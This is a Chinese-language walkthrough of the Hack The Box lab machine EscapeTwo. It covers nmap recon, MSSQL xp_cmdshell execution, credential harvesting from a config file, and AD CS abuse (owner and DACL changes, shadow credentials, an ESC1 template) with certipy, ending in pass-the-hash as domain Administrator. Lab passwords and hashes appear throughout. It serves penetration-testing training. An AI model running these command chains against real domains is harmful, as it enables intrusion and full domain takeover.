EscapeTwo-HTB

攻防渗透
, ,

信息收集

先来进行namap扫描nmap -sV -sC -O 10.10.11.51 结果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-29 15:03 CST
Nmap scan report for 10.10.11.51
Host is up (2.3s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-29 07:05:45Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-29T07:09:29+00:00; -1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-29T07:09:26+00:00; 0s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-28T20:40:08
|_Not valid after:  2055-01-28T20:40:08
|_ssl-date: 2025-01-29T07:09:29+00:00; -1s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-29T07:09:29+00:00; -1s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-29T07:09:26+00:00; 0s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-29T07:08:47
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 386.20 seconds

可以看到存在smb服务还有mssql数据库服务。
使用 smbmap看看文件夹权限smbmap -u rose -p 'KxEPkKe6R8su' -H 10.10.11.51

看看Accounting Department有什么

有两个表格下载下来看看

漏洞利用

可以看到有账户密码,又联想到之前mssql端口开放想着去利用下xp_cmdshell,学习到别人使用netexec可以执行命令,先来查看下权限
nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth --list

这里其实已经是admin权限了。不用再去提权了不过也记录下提权的命令
nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth --module mssql_priv
接下来执行命令利用 -x参数是xp_cmd的形式
nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'whoami'

成功执行命令,然后去看一下配置文件

nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'type C:\SQL2019\ExpressAdv_enu\sql-Configuration.INI'

这里有用户和密码,直接使用winrm登录,但是发现密码不对,去看看还有哪些用户

登录ryan试试。

成功登录,查看flag即可。

内网信息收集

使用bloodhound-python收集信息
bloodhound-python -u 'ryan' -p 'WqSZAF6CysDQbGb3' -d sequel.htb -ns 10.10.11.51 -c All

可以看到ryan对CAS_CVC用户具有 WriteOwner权限  此权限允许用户或组修改对象的所有者。

这里可以看到CA_SVC是证书的发布者,所以思路是修改该用户为ryan

漏洞利用

_具有 ESC1 漏洞的证书模板允许低权限用户代表用户指定的任何域对象注册和请求证书。这意味着任何具有注册权限的用户都可以为特权帐户(如域管理员)请求证书。
参考:
https://www.cnblogs.com/cyyyyi/p/17797616.html
https://whoamianony.top/posts/attack-surface-mining-for-ad-cs/

bloodyAD --host 10.10.11.51 -d escapetwo.htb -u ryan -p WqSZAF6CysDQbGb3 set owner CA_SVC ryan

然后修改 CA_SVC 的 DACL(DACL 是 ACL 的一种特定类型,用于在 Windows 操作系统中管理对象访问。DACL 是对象安全描述符的一部分,定义了哪些用户或组对对象具有哪些访问权限。DACL 中的每个 ACE(访问控制条目)指定了特定用户或组的权限。)
使用impacket-dacledit
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"

certipy-ad 生成新的密钥凭证,启用基于证书的身份验证,保存的 ccache 文件可以用于 Kerberos 攻击。
certipy-ad shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.10.11.51' -target dc01.sequel.htb -ns 10.10.11.51

修改证书模板,用于可以提升权限,可以允许使用提升的权限颁发证书。
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51

请求具有 UPN(用户主体名称)Administrator@sequel.htb 的证书,从而启用 Administrator 的账户。
certipy-ad req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target dc01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51

使用 Administrator 权限检索 NTLM

certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.10.11.51
获取到hash之后直接winrm登录即可
evil-winrm -i 10.10.11.51 -u administrator -H "7a8d4e04986afa8ed4060f75e5a0b3ff"

参考:
https://natro92.fun/posts/cbb1724c/#Administrator
https://www.hyhforever.top/htb-escapetwo/